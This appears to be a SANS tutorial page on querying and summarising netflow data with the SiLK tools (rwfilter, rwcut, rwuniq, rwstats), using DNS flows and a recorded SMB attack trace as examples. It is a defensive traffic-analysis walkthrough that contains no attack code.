<p>Get the start and end dates of the repository.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsiteinfo --fields=repo-start,repo-end</span></b></span>
<span style="color: white;"> Start-Date| End-Date|</span>
<span style="color: white;">2018/10/01T01:00:00|2022/07/03T19:00:00|</span>
</pre></td></tr></tbody></table></div>
<p>Leverage <b><i>rwcount</i></b> to count flow records, bytes and packets per time bin (30-second bins by default). The fractional record counts below come from rwcount apportioning a flow that spans a bin boundary across the bins it touches.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcount /tmp/attack-trace.rw</span></b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2019/04/20T03:28:00| 2.60| 2218.09| 16.36|</span>
<span style="color: white;">2019/04/20T03:28:30| 9.40| 176342.91| 331.64|</span>
</pre></td></tr></tbody></table></div>
<p>Leverage <b><i>rwfilter</i></b> to retrieve flows between a start and an end date, for all IP protocols (<i>--protocol=0-</i>) and all traffic types (<i>--type=all</i>), where either address is <i>8.8.8.8</i> (<i>--any-address</i>). Stop after the first 100 matching records (<i>--max-pass=100</i>) and save them to a file named <i>8.rw</i> (<i>--pass=8.rw</i>).</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--type=all --any-address=8.8.8.8 </span></b></span><b><span style="color: #fcff01;">--max-pass=100 --pass=8.rw</span></b></pre></td></tr></tbody></table></div>
<p>Get information on the <i>8.rw</i> file via <b><i>rwfileinfo</i></b>. Note that the file header records the command line that created it.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfileinfo 8.rw</span></b></span>
<span style="color: white;">8.rw:</span>
<span style="color: white;"> format(id) FT_RWIPV6ROUTING(0x0c)</span>
<span style="color: white;"> version 16</span>
<span style="color: white;"> byte-order littleEndian</span>
<span style="color: white;"> compression(id) none(0)</span>
<span style="color: white;"> header-length 176</span>
<span style="color: white;"> record-length 88</span>
<span style="color: white;"> record-version 1</span>
<span style="color: white;"> silk-version 3.19.2</span>
<span style="color: white;"> count-records 100</span>
<span style="color: white;"> file-size 8976</span>
<span style="color: white;"> command-lines</span>
<span style="color: white;"> 1 rwfilter --start=2022/01/05 --end=2022/07/01T23 --protocol=0- --type=all --any-address=8.8.8.8 --max-pass=100 --pass=8.rw</span>
</pre></td></tr></tbody></table></div>
<p>Access the file just saved with the <b><i>rwcut</i></b> tool, selecting a few fields to display.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut 8.rw --fields sip,sPort,dIP,dPort</span><span style="color: white;"> </span></b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|56213|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|55171|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|54512|</span>
<span style="color: white;"> ....</span>
</pre></td></tr></tbody></table></div>
<p>Confirm the number of records in the file <i>8.rw</i>.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut 8.rw --no-title | wc --lines</span></b></span><b><span style="color: #fcff01;">
<span>100</span>
</span></b></pre></td></tr></tbody></table></div>
<p>Use <b><i>rwcut</i></b> to get more details from a flow file named <i>attack-trace.rw</i>, limiting the output to two records.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut attack-trace.rw --fields=sIP,sPort,dIP,dPort,bytes,stime --num-recs=2</span></b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort| bytes| sTime|</span>
<span style="color: white;"> 98.114.205.102| 1821| 192.150.11.111| 445| 168|2019/04/20T03:28:28.374|</span>
<span style="color: white;"> 192.150.11.111| 445| 98.114.205.102| 1821| 128|2019/04/20T03:28:28.375|</span>
</pre></td></tr></tbody></table></div>
<p>Remove the padding to the left of the IP columns (width reserved for IPv6 addresses) with <i>--ipv6-policy=ignore</i>. We could also have set the environment variable <i>SILK_IPV6_POLICY=ignore</i>.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut attack-trace.rw --fields=sIP,sPort,dIP,dPort,bytes,stime --num-recs=2 --ipv6-policy=ignore</span></b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort| bytes| sTime|</span>
<span style="color: white;"> 98.114.205.102| 1821| 192.150.11.111| 445| 168|2019/04/20T03:28:28.374|</span>
<span style="color: white;"> 192.150.11.111| 445| 98.114.205.102| 1821| 128|2019/04/20T03:28:28.375|</span>
</pre></td></tr></tbody></table></div>
<p><b><i>rwcut</i></b> can be used without specifying fields; it then shows its 12 default fields, as in the example below, where <b><i>rwfilter</i></b> writes its matches to stdout and pipes them into <b><i>rwcut</i></b>.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --protocol=0- --type=all --any-address=8.8.8.8 --max-pass=100 --pass=stdout | rwcut --num-recs=2</span></b></span>
<span style="color: white;"> sIP| dIP|sPort|dPort|pro| packets| bytes| flags| sTime| duration| eTime| sensor|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137| 53|56213| 17| 1| 218| |2022/02/08T14:26:40.723| 0.001|2022/02/08T14:26:40.724| Internal|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137| 53|55171| 17| 1| 102| |2022/02/08T14:27:10.329| 0.013|2022/02/08T14:27:10.342| Internal|</span>
</pre></td></tr></tbody></table></div>
<p>Use <b><i>rwcut</i></b> to get a CSV file from the retrieved data, for example to feed it into your machine learning algorithms, something we teach in the <a href="https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/" target="_blank">SANS SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals</a>, or to import it into Pandas or Excel.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut attack-trace.rw --fields=sIP,sPort,dIP,dPort,bytes,stime \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--num-recs=2 --ipv6-policy=ignore --no-columns --delimited=, --no-final-delimiter</span></b></span>
<span style="color: white;">sIP,sPort,dIP,dPort,bytes,sTime</span>
<span style="color: white;">98.114.205.102,1821,192.150.11.111,445,168,2019/04/20T03:28:28.374</span>
<span style="color: white;">192.150.11.111,445,98.114.205.102,1821,128,2019/04/20T03:28:28.375</span>
</pre></td></tr></tbody></table></div>
<p>Select flows in a particular byte range (<i>--bytes=0-30</i>) and summarize them with <b><i>rwuniq</i></b>, which counts the records for each distinct combination of the fields given.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- --pass=stdout --type=all --bytes=0-30 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--max-pass=5</span></b><span style="color: white;"> |</span> </span><span><b><span style="color: #fcff01;">rwuniq --fields=sIP,dIP,bytes,packets</span></b></span>
<span style="color: white;"> sIP| dIP| bytes| packets| Records|</span>
<span style="color: white;"> 10.200.223.7| 172.28.10.1| 28| 1| 1|</span>
<span style="color: white;"> 10.200.223.7| 172.28.20.1| 28| 1| 1|</span>
<span style="color: white;"> 10.200.223.7| 172.28.1.1| 28| 1| 1|</span>
<span style="color: white;"> 10.200.223.7| 172.28.30.64| 28| 1| 1|</span>
<span style="color: white;"> 10.200.223.7| 172.28.30.65| 28| 1| 1|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Group data into 24-hour bins/buckets.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass=stdout --type=all --bytes=0-30 | rwuniq --bin-time=86400 --fields stime,type \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--values=records --sort-output</span></b></span>
<span style="color: white;"> sTime| type| Records|</span>
<span style="color: white;">2022/02/12T00:00:00| in| 4136|</span>
<span style="color: white;">2022/02/12T00:00:00| out| 52|</span>
<span style="color: white;">2022/02/13T00:00:00| in| 2469|</span>
<span style="color: white;">2022/02/14T00:00:00| in| 4307|</span>
<span style="color: white;">2022/02/14T00:00:00| out| 7|</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Grouping data into 1-hour bins/buckets.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass=stdout --type=all --bytes=0-30 | rwuniq --bin-time=3600 --fields stime,type \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--values=records --sort-output</span></b></span>
<span style="color: white;"> sTime| type| Records|</span>
<span style="color: white;">2022/02/12T19:00:00| in| 2|</span>
<span style="color: white;">2022/02/12T20:00:00| in| 3674|</span>
<span style="color: white;">2022/02/12T20:00:00| out| 52|</span>
<span style="color: white;">2022/02/12T21:00:00| in| 14|</span>
<span style="color: white;">2022/02/12T22:00:00| in| 446|</span>
<span style="color: white;">....</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get the number of bytes within each time bin by using <i>--values=bytes</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass=stdout --type=all --bytes=0-30 | rwuniq --bin-time=86400 --fields stime,type \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--values=bytes --sort-output | head --lines=10</span></b></span><b style="color: #fcff01;">
</b><span><b style="color: #fcff01;"> </b><span style="color: white;"> sTime| type| Bytes|</span></span><span style="color: white;">
<span>2022/02/12T00:00:00| in| 115808|</span>
<span>2022/02/12T00:00:00| out| 1456|</span>
<span>2022/02/13T00:00:00| in| 69132|</span>
<span>2022/02/14T00:00:00| in| 120596|</span>
<span>2022/02/14T00:00:00| out| 196|</span>
<span>2022/02/16T00:00:00| out| 120|</span>
<span>2022/02/17T00:00:00| in| 5527373|</span>
<span>2022/02/17T00:00:00| out| 882|</span>
<span>2022/02/18T00:00:00| in| 29|</span></span><b style="color: #fcff01;">
</b></pre></td></tr></tbody></table></div>
<p></p><p>Extending further, grabbing the count of the distinct source and destination IPs.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- --pass=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--type=all --bytes=0-30 | rwuniq --bin-time=86400 --fields stime,type --values=bytes,sip,dip \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--sort-output | head --lines=10</span></b></span>
<span style="color: white;"> sTime| type| Bytes| sIP-Distinct| dIP-Distinct|</span>
<span style="color: white;">2022/02/12T00:00:00| in| 115808| 2| 3268|</span>
<span style="color: white;">2022/02/12T00:00:00| out| 1456| 1| 1|</span>
<span style="color: white;">2022/02/13T00:00:00| in| 69132| 1| 2387|</span>
<span style="color: white;">2022/02/14T00:00:00| in| 120596| 1| 4199|</span>
<span style="color: white;">2022/02/14T00:00:00| out| 196| 7| 1|</span>
<span style="color: white;">2022/02/16T00:00:00| out| 120| 1| 4|</span>
<span style="color: white;">2022/02/17T00:00:00| in| 5527373| 3| 13|</span>
<span style="color: white;">2022/02/17T00:00:00| out| 882| 7| 21|</span>
<span style="color: white;">2022/02/18T00:00:00| in| 29| 1| 1|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>By default <i><b>rwuniq</b></i> counts <i>records</i>, i.e. <i>--values=records</i>. This option determines what is counted in each bin.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields sIP</span></b></span>
<span style="color: white;"> sIP| Records|</span>
<span style="color: white;"> 192.150.11.111| 6|</span>
<span style="color: white;"> 98.114.205.102| 6|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>The above is the same as <i>--values=records</i>, meaning the records are counted in each bin.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields sIP --values=records</span></b></span>
<span style="color: white;"> sIP| Records|</span>
<span style="color: white;"> 192.150.11.111| 6|</span>
<span style="color: white;"> 98.114.205.102| 6|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Expand <b>rwuniq</b> to use the <i>stime</i> and <i>source IP</i> fields as the key, with <i>bytes</i> as the value, and sort the output.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields stime,sip --values=bytes --sort-output --bin-time=600</span></b></span>
<span style="color: white;"> sTime| sIP| Bytes|</span>
<span style="color: white;">2019/04/20T03:20:00| 98.114.205.102| 171264|</span>
<span style="color: white;">2019/04/20T03:20:00| 192.150.11.111| 7297|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Group by packets with a bin size of 10 minutes.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields stime,sip --values=packets \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--sort-output --bin-time=600</span></b></span>
<span style="color: white;"> sTime| sIP| Packets|</span>
<span style="color: white;">2019/04/20T03:20:00| 98.114.205.102| 195|</span>
<span style="color: white;">2019/04/20T03:20:00| 192.150.11.111| 153|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Group by both packets and bytes.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields stime,sip --values=bytes,packets --sort-output --bin-time=600</span></b></span>
<span style="color: white;"> sTime| sIP| Bytes| Packets|</span>
<span style="color: white;">2019/04/20T03:20:00| 98.114.205.102| 171264| 195|</span>
<span style="color: white;">2019/04/20T03:20:00| 192.150.11.111| 7297| 153|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Assuming the input has already been sorted, we can pass <i>--presorted-input</i> to the <b>rwuniq</b> command.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields sip,stime --values=bytes,packets --presorted-input --bin-time=600</span></b></span>
<span style="color: white;"> sIP| sTime| Bytes| Packets|</span>
<span style="color: white;"> 98.114.205.102|2019/04/20T03:20:00| 168| 4|</span>
<span style="color: white;"> 192.150.11.111|2019/04/20T03:20:00| 128| 3|</span>
<span style="color: white;"> 98.114.205.102|2019/04/20T03:20:00| 4777| 14|</span>
<span style="color: white;"> 192.150.11.111|2019/04/20T03:20:00| 1590| 17|</span>
<span style="color: white;"> ...</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Once again, use <i>--ipv6-policy=ignore</i> to remove the padding on the left.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields sip,stime --values=bytes,packets \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--presorted-input --bin-time=600 --ipv6-policy=ign</span></b></span><b><span style="color: #fcff01;"><span>ore</span></span></b>
<span style="color: white;"> sIP| sTime| Bytes| Packets|</span>
<span style="color: white;"> 98.114.205.102|2019/04/20T03:20:00| 168| 4|</span>
<span style="color: white;"> 192.150.11.111|2019/04/20T03:20:00| 128| 3|</span>
<span style="color: white;"> 98.114.205.102|2019/04/20T03:20:00| 4777| 14|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Finding the most commonly used protocols with <b><i>rwstats</i></b>.<br /><b><i>rwstats</i></b> groups records into bins by one or more fields, optionally by time.<br /><b><i>rwstats</i></b> can report the top N and bottom N bins, which <b>rwuniq</b> cannot do.<br /><b><i>rwstats</i></b> can also compute summary percentages.</p><p>Find the top 10 protocols in a 10-minute span.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --fields=protocol,stime \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--count=10 --bin-time=600 --values=bytes</span></b></span>
<span style="color: white;">INPUT: 12 Records for 1 Bin and 178561 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 10 Bins by Bytes</span>
<span style="color: white;">pro| sTime| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 6|2019/04/20T03:20:00| 178561|100.000000|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Grab the top 5 bins within a 5-minute span, ranked by bytes.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=0- --start-date=2022/01/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--end-date=2022/05/01 --pass=stdout --max-pass=100 | rwstats --field=stime,sIP \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--count=5 --values=bytes --bin-time=300</b></span>
<span style="color: white;">INPUT: 100 Records for 5 Bins and 17964 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sTime| sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;">2022/02/08T14:40:00| 8.8.8.8| 13785| 76.736807| 76.736807|</span>
<span style="color: white;">2022/02/08T14:35:00| 8.8.8.8| 2166| 12.057448| 88.794255|</span>
<span style="color: white;">2022/02/08T14:25:00| 8.8.8.8| 1101| 6.128925| 94.923180|</span>
<span style="color: white;">2022/02/08T14:30:00| 8.8.8.8| 836| 4.653752| 99.576932|</span>
<span style="color: white;">2022/02/08T14:40:00| 17.253.26.125| 76| 0.423068|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Top 5 records by <i>bytes</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=0- --start-date=2022/01/01 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass=stdout --max-pass=1000 | rwstats --field=protocol --count=5 --values=bytes \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--bin-time=300</b></span>
<span style="color: white;">INPUT: 1000 Records for 4 Bins and 5287991 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;">pro| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 6| 5142342| 97.245665| 97.245665|</span>
<span style="color: white;"> 17| 134037| 2.534743| 99.780408|</span>
<span style="color: white;"> 1| 11500| 0.217474| 99.997882|</span>
<span style="color: white;"> 58| 112| 0.002118|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Top 5 records by <i>packets</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=0- --start-date=2022/01/01 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass=stdout --max-pass=1000 | rwstats --field=protocol --count=5 --values=packets \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--bin-time=300</b></span>
<span style="color: white;">INPUT: 1000 Records for 4 Bins and 10277 Total Packets</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Packets</span>
<span style="color: white;">pro| Packets| %Packets| cumul_%|</span>
<span style="color: white;"> 6| 9235| 89.860854| 89.860854|</span>
<span style="color: white;"> 17| 915| 8.903376| 98.764231|</span>
<span style="color: white;"> 1| 125| 1.216308| 99.980539|</span>
<span style="color: white;"> 58| 2| 0.019461|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Top 5 records by <i>records</i>, which is the default when no values are specified.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=0- --start-date=2022/01/01 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass=stdout --max-pass=1000 | rwstats --field=protocol --count=5 --bin-time=300</b></span>
<span style="color: white;">INPUT: 1000 Records for 4 Bins and 1000 Total Records</span>
